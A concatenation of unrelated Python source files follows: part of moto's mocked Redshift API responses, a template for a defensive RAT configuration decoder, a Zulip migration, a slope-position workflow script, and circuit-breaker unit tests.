"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def create_cluster_security_group(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
description = self._get_param("Description")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
security_group = self.redshift_backend.create_cluster_security_group(
cluster_security_group_name=cluster_security_group_name,
description=description,
region_name=self.region,
tags=tags,
)
return self.get_response(
{
"CreateClusterSecurityGroupResponse": {
"CreateClusterSecurityGroupResult": {
"ClusterSecurityGroup": security_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_security_groups(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
security_groups = self.redshift_backend.describe_cluster_security_groups(
cluster_security_group_name
)
return self.get_response(
{
"DescribeClusterSecurityGroupsResponse": {
"DescribeClusterSecurityGroupsResult": {
"ClusterSecurityGroups": [
security_group.to_json()
for security_group in security_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_security_group(self):
security_group_identifier = self._get_param("ClusterSecurityGroupName")
self.redshift_backend.delete_cluster_security_group(security_group_identifier)
return self.get_response(
{
"DeleteClusterSecurityGroupResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def authorize_cluster_security_group_ingress(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
cidr_ip = self._get_param("CIDRIP")
security_group = self.redshift_backend.authorize_cluster_security_group_ingress(
cluster_security_group_name, cidr_ip
)
return self.get_response(
{
"AuthorizeClusterSecurityGroupIngressResponse": {
"AuthorizeClusterSecurityGroupIngressResult": {
"ClusterSecurityGroup": {
"ClusterSecurityGroupName": cluster_security_group_name,
"Description": security_group.description,
"IPRanges": [
{
"Status": "authorized",
"CIDRIP": cidr_ip,
"Tags": security_group.tags,
},
],
}
}
}
}
)
def create_cluster_parameter_group(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
group_family = self._get_param("ParameterGroupFamily")
description = self._get_param("Description")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
parameter_group = self.redshift_backend.create_cluster_parameter_group(
cluster_parameter_group_name, group_family, description, self.region, tags
)
return self.get_response(
{
"CreateClusterParameterGroupResponse": {
"CreateClusterParameterGroupResult": {
"ClusterParameterGroup": parameter_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_parameter_groups(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
parameter_groups = self.redshift_backend.describe_cluster_parameter_groups(
cluster_parameter_group_name
)
return self.get_response(
{
"DescribeClusterParameterGroupsResponse": {
"DescribeClusterParameterGroupsResult": {
"ParameterGroups": [
parameter_group.to_json()
for parameter_group in parameter_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_parameter_group(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
self.redshift_backend.delete_cluster_parameter_group(
cluster_parameter_group_name
)
return self.get_response(
{
"DeleteClusterParameterGroupResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def create_cluster_snapshot(self):
cluster_identifier = self._get_param("ClusterIdentifier")
snapshot_identifier = self._get_param("SnapshotIdentifier")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
snapshot = self.redshift_backend.create_cluster_snapshot(
cluster_identifier, snapshot_identifier, self.region, tags
)
return self.get_response(
{
"CreateClusterSnapshotResponse": {
"CreateClusterSnapshotResult": {"Snapshot": snapshot.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_snapshots(self):
cluster_identifier = self._get_param("ClusterIdentifier")
snapshot_identifier = self._get_param("SnapshotIdentifier")
snapshots = self.redshift_backend.describe_cluster_snapshots(
cluster_identifier, snapshot_identifier
)
return self.get_response(
{
"DescribeClusterSnapshotsResponse": {
"DescribeClusterSnapshotsResult": {
"Snapshots": [snapshot.to_json() for snapshot in snapshots]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_snapshot(self):
snapshot_identifier = self._get_param("SnapshotIdentifier")
snapshot = self.redshift_backend.delete_cluster_snapshot(snapshot_identifier)
return self.get_response(
{
"DeleteClusterSnapshotResponse": {
"DeleteClusterSnapshotResult": {"Snapshot": snapshot.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_snapshot_copy_grant(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName"),
"kms_key_id": self._get_param("KmsKeyId"),
"region_name": self._get_param("Region"),
}
copy_grant = self.redshift_backend.create_snapshot_copy_grant(
**copy_grant_kwargs
)
return self.get_response(
{
"CreateSnapshotCopyGrantResponse": {
"CreateSnapshotCopyGrantResult": {
"SnapshotCopyGrant": copy_grant.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_snapshot_copy_grant(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName")
}
self.redshift_backend.delete_snapshot_copy_grant(**copy_grant_kwargs)
return self.get_response(
{
"DeleteSnapshotCopyGrantResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def describe_snapshot_copy_grants(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName")
}
copy_grants = self.redshift_backend.describe_snapshot_copy_grants(
**copy_grant_kwargs
)
return self.get_response(
{
"DescribeSnapshotCopyGrantsResponse": {
"DescribeSnapshotCopyGrantsResult": {
"SnapshotCopyGrants": [
copy_grant.to_json() for copy_grant in copy_grants
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_tags(self):
resource_name = self._get_param("ResourceName")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
self.redshift_backend.create_tags(resource_name, tags)
return self.get_response(
{
"CreateTagsResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def describe_tags(self):
resource_name = self._get_param("ResourceName")
resource_type = self._get_param("ResourceType")
tagged_resources = self.redshift_backend.describe_tags(
resource_name, resource_type
)
return self.get_response(
{
"DescribeTagsResponse": {
"DescribeTagsResult": {"TaggedResources": tagged_resources},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_tags(self):
resource_name = self._get_param("ResourceName")
tag_keys = self.unpack_list_params("TagKeys.TagKey")
self.redshift_backend.delete_tags(resource_name, tag_keys)
return self.get_response(
{
"DeleteTagsResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def enable_snapshot_copy(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"destination_region": self._get_param("DestinationRegion"),
"retention_period": self._get_param("RetentionPeriod", 7),
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName"),
}
cluster = self.redshift_backend.enable_snapshot_copy(**snapshot_copy_kwargs)
return self.get_response(
{
"EnableSnapshotCopyResponse": {
"EnableSnapshotCopyResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def disable_snapshot_copy(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier")
}
cluster = self.redshift_backend.disable_snapshot_copy(**snapshot_copy_kwargs)
return self.get_response(
{
"DisableSnapshotCopyResponse": {
"DisableSnapshotCopyResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def modify_snapshot_copy_retention_period(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"retention_period": self._get_param("RetentionPeriod"),
}
cluster = self.redshift_backend.modify_snapshot_copy_retention_period(
**snapshot_copy_kwargs
)
return self.get_response(
{
"ModifySnapshotCopyRetentionPeriodResponse": {
"ModifySnapshotCopyRetentionPeriodResult": {
"Clusters": [cluster.to_json()]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def get_cluster_credentials(self):
cluster_identifier = self._get_param("ClusterIdentifier")
db_user = self._get_param("DbUser")
auto_create = self._get_bool_param("AutoCreate", False)
duration_seconds = self._get_int_param("DurationSeconds", 900)
cluster_credentials = self.redshift_backend.get_cluster_credentials(
cluster_identifier, db_user, auto_create, duration_seconds
)
return self.get_response(
{
"GetClusterCredentialsResponse": {
"GetClusterCredentialsResult": cluster_credentials,
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
| william-richard/moto | moto/redshift/responses.py | Python | apache-2.0 | 28,522 |
#!/usr/bin/env python
'''
ArCom Rat Config Decoder
'''
__description__ = 'ArCom Rat Config Extractor'
__author__ = 'Kevin Breen http://techanarchy.net http://malwareconfig.com'
__version__ = '0.1'
__date__ = '2014/04/10'
#Standard Imports Go Here
import os
import sys
import base64
import string
from optparse import OptionParser
#Non Standard Imports
try:
from Crypto.Cipher import Blowfish
except ImportError:
print "[+] Couldn't Import Cipher, try 'sudo pip install pycrypto'"
# Main Decode Function Goes Here
'''
data is a read of the file
Must return a python dict of values
'''
def run(data):
pass
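# Illustrative note (not part of the original template): a completed run() is
# expected to return a flat dict of config fields, e.g. keys such as 'Domain',
# 'Port' and 'Campaign ID' as consumed by runRecursive() below, or None when no
# config is found.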
#Helper Functions Go Here
#Recursive Function Goes Here
def runRecursive(folder, output):
counter1 = 0
counter2 = 0
print "[+] Writing Configs to File {0}".format(output)
with open(output, 'a+') as out:
#This line will need changing per Decoder
out.write("Filename,Domain, Port, Install Path, Install Name, StartupKey, Campaign ID, Mutex Main, Mutex Per, YPER, YGRB, Mutex Grabber, Screen Rec Link, Mutex 4, YVID, YIM, No, Smart, Plugins, Flag1, Flag2, Flag3, Flag4, WebPanel, Remote Delay\n")
for server in os.listdir(folder):
fileData = open(os.path.join(folder,server), 'rb').read()
configOut = run(fileData)
if configOut != None:
#This line will need changing per Decoder
out.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10},{11},{12},{13},{14},{15},{16},{17},{18},{19},{20},{21},{22},{23},{24},{25}\n'.format(server, configOut["Domain"],configOut["Port"],configOut["Install Path"],configOut["Install Name"],configOut["Startup Key"],configOut["Campaign ID"],configOut["Mutex Main"],configOut["Mutex Per"],configOut["YPER"],configOut["YGRB"],configOut["Mutex Grabber"],configOut["Screen Rec Link"],configOut["Mutex 4"],configOut["YVID"],configOut["YIM"],configOut["NO"],configOut["Smart Broadcast"],configOut["YES"],configOut["Plugins"],configOut["Flag1"],configOut["Flag2"],configOut["Flag3"],configOut["Flag4"],configOut["WebPanel"],configOut["Remote Delay"]))
counter1 += 1
            counter2 += 1  # count every file scanned, not just successful decodes
print "[+] Decoded {0} out of {1} Files".format(counter1, counter2)
return "Complete"
# Main
if __name__ == "__main__":
parser = OptionParser(usage='usage: %prog inFile outConfig\n' + __description__, version='%prog ' + __version__)
parser.add_option("-r", "--recursive", action='store_true', default=False, help="Recursive Mode")
(options, args) = parser.parse_args()
    # If we don't have args, quit with help page
if len(args) > 0:
pass
else:
parser.print_help()
sys.exit()
# if we want a recursive extract run this function
if options.recursive == True:
if len(args) == 2:
runRecursive(args[0], args[1])
sys.exit()
else:
print "[+] You need to specify Both Dir to read AND Output File"
parser.print_help()
sys.exit()
    # If not recursive, try to open file
try:
print "[+] Reading file"
fileData = open(args[0], 'rb').read()
except:
print "[+] Couldn't Open File {0}".format(args[0])
#Run the config extraction
print "[+] Searching for Config"
config = run(fileData)
    # If we have a config, figure out where to dump it.
if config == None:
print "[+] Config not found"
sys.exit()
    # If you gave me two args, I'm going to assume the 2nd arg is where you want to save the file
if len(args) == 2:
print "[+] Writing Config to file {0}".format(args[1])
with open(args[1], 'a') as outFile:
for key, value in sorted(config.iteritems()):
clean_value = filter(lambda x: x in string.printable, value)
outFile.write("Key: {0}\t Value: {1}\n".format(key,clean_value))
    # If there's no second arg, assume you want it printed to screen
else:
print "[+] Printing Config to screen"
for key, value in sorted(config.iteritems()):
clean_value = filter(lambda x: x in string.printable, value)
print " [-] Key: {0}\t Value: {1}".format(key,clean_value)
print "[+] End of Config"
| 0x0mar/RATDecoders | TEMPLATE.py | Python | gpl-3.0 | 3,894 |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('zerver', '0048_enter_sends_default_to_false'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='pm_content_in_desktop_notifications',
field=models.BooleanField(default=True),
),
]
| mahim97/zulip | zerver/migrations/0049_userprofile_pm_content_in_desktop_notifications.py | Python | apache-2.0 | 404 |
"""Prototype-based fuzzy slope positions.
@author : Liangjun Zhu
@changelog:
- 15-03-20 - lj - initial implementation.
- 17-07-30 - lj - reorganize and incorporate with pygeoc.
"""
from __future__ import absolute_import, unicode_literals
import os
import sys
if os.path.abspath(os.path.join(sys.path[0], '..')) not in sys.path:
sys.path.insert(0, os.path.abspath(os.path.join(sys.path[0], '..')))
from autofuzslppos.Config import get_input_cfgs
from autofuzslppos.FuzzySlpPosInference import fuzzy_inference
from autofuzslppos.PreProcessing import pre_processing
from autofuzslppos.SelectTypLoc import extract_typical_location
def main():
"""Main workflow."""
fuzslppos_cfg = get_input_cfgs()
pre_processing(fuzslppos_cfg)
extract_typical_location(fuzslppos_cfg)
fuzzy_inference(fuzslppos_cfg)
if __name__ == '__main__':
main()
| lreis2415/SEIMS | seims/preprocess/autofuzslppos/main.py | Python | gpl-3.0 | 884 |
import contexts
from unittest import mock
from poll import circuitbreaker, CircuitBrokenError
class WhenAFunctionWithCircuitBreakerDoesNotThrow:
def given_a_call_counter(self):
self.x = 0
self.expected_args = (1, 4, "hello")
self.expected_kwargs = {"blah": "bloh", "bleh": 5}
self.expected_return_value = "some thing that was returned"
def when_i_call_the_circuit_breaker_function(self):
self.result = self.function_to_break(*self.expected_args, **self.expected_kwargs)
def it_should_forward_the_arguments(self):
assert self.args == self.expected_args
def it_should_forward_the_keyword_arguments(self):
assert self.kwargs == self.expected_kwargs
def it_should_call_it_once(self):
assert self.x == 1
def it_should_return_the_result_of_the_function(self):
assert self.result is self.expected_return_value
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self, *args, **kwargs):
self.x += 1
self.args = args
self.kwargs = kwargs
return self.expected_return_value
class WhenAFunctionWithCircuitBreakerThrowsOnceAndTheOnErrorCallbackHasNoParams:
def given_an_exception_to_throw(self):
self.x = 0
self.expected_exception = ValueError()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1, on_error=self.on_error_callback)
def function_to_break():
self.x += 1
raise self.expected_exception
self.function_to_break = function_to_break
def when_i_call_the_circuit_breaker_function(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
def it_should_call_the_function_to_break_once(self):
assert self.x == 1
def it_should_call_the_on_error_callback(self):
assert self.on_error_called
def on_error_callback(self):
self.on_error_called = True
class WhenAFunctionWithCircuitBreakerThrowsOnceAndTheOnErrorCallbackHasOneParam:
def given_an_exception_to_throw(self):
self.x = 0
self.expected_exception = ValueError()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1, on_error=self.on_error_callback)
def function_to_break():
self.x += 1
raise self.expected_exception
self.function_to_break = function_to_break
def when_i_call_the_circuit_breaker_function(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
def it_should_call_the_function_to_break_once(self):
assert self.x == 1
def it_should_call_the_on_error_callback(self):
assert self.on_error_result is self.expected_exception
def on_error_callback(self, ex):
self.on_error_result = ex
class WhenACircuitBreakerIsOnTheThresholdOfBreaking:
def given_the_function_has_failed_twice(self):
self.expected_exception = ValueError()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_the_call_fails_again(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
raise self.expected_exception
class WhenCircuitIsBroken:
def given_the_function_has_failed_three_times(self):
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
self.x = 0
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
self.x = 0
def when_i_call_the_circuit_breaker_function(self):
self.mock.return_value = 0.5
self.exception = contexts.catch(self.function_to_break)
def it_should_throw_CircuitBrokenError(self):
assert isinstance(self.exception, CircuitBrokenError)
def it_should_say_how_long_it_will_take_to_close_the_circuit(self):
assert self.exception.time_remaining == 0.5
def it_should_not_call_the_function(self):
assert self.x == 0
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise ValueError
# 'leaky bucket' functionality
class WhenTheCircuitBreakerWasAboutToTripAndWeWaitForTheTimeout:
def given_the_circuit_was_about_to_be_broken(self):
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
self.mock.return_value = 0.5
contexts.catch(self.function_to_break)
self.mock.return_value = 1.1
def when_we_run_the_function_again(self):
self.exception1 = contexts.catch(self.function_to_break)
self.exception2 = contexts.catch(self.function_to_break)
self.exception3 = contexts.catch(self.function_to_break)
def it_should_have_decremented_the_failure_count(self):
assert isinstance(self.exception1, ValueError)
assert isinstance(self.exception2, ValueError)
assert isinstance(self.exception3, CircuitBrokenError)
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
raise ValueError
class WhenTheCircuitIsHalfBrokenAndTheFunctionSucceeds:
def given_the_circuit_was_broken_in_the_past(self):
self.x = 0
self.expected_return_value = "some thing that was returned"
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.mock.return_value = 1.1
self.result = self.function_to_break()
def it_should_call_the_function(self):
assert self.x == 4
def it_should_forward_the_return_value(self):
assert self.result == self.expected_return_value
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
if self.x < 3:
raise ValueError
return self.expected_return_value
class WhenTheCircuitIsHalfBrokenAndTheFunctionFails:
def given_the_circuit_was_broken_in_the_past(self):
self.x = 0
self.expected_exception = ValueError()
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.mock.return_value = 1.1
self.exception = contexts.catch(self.function_to_break)
def it_should_call_the_function(self):
assert self.x == 4
def it_should_bubble_out_the_exception(self):
assert self.exception is self.expected_exception
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise self.expected_exception
class WhenRetryingAfterTheFunctionFailedInTheHalfBrokenState:
def given_the_circuit_was_half_broken_and_the_function_failed_again(self):
self.x = 0
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
self.mock.return_value = 1.1
contexts.catch(self.function_to_break)
def when_we_wait_for_the_timeout_and_retry(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_not_call_the_function(self):
assert self.x == 4
def it_should_throw_CircuitBrokenError(self):
assert isinstance(self.exception, CircuitBrokenError)
def cleanup_the_mock(self):
self.patch.stop()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise ValueError
| benjamin-hodgson/poll | test/circuit_breaker_tests.py | Python | mit | 8,673 |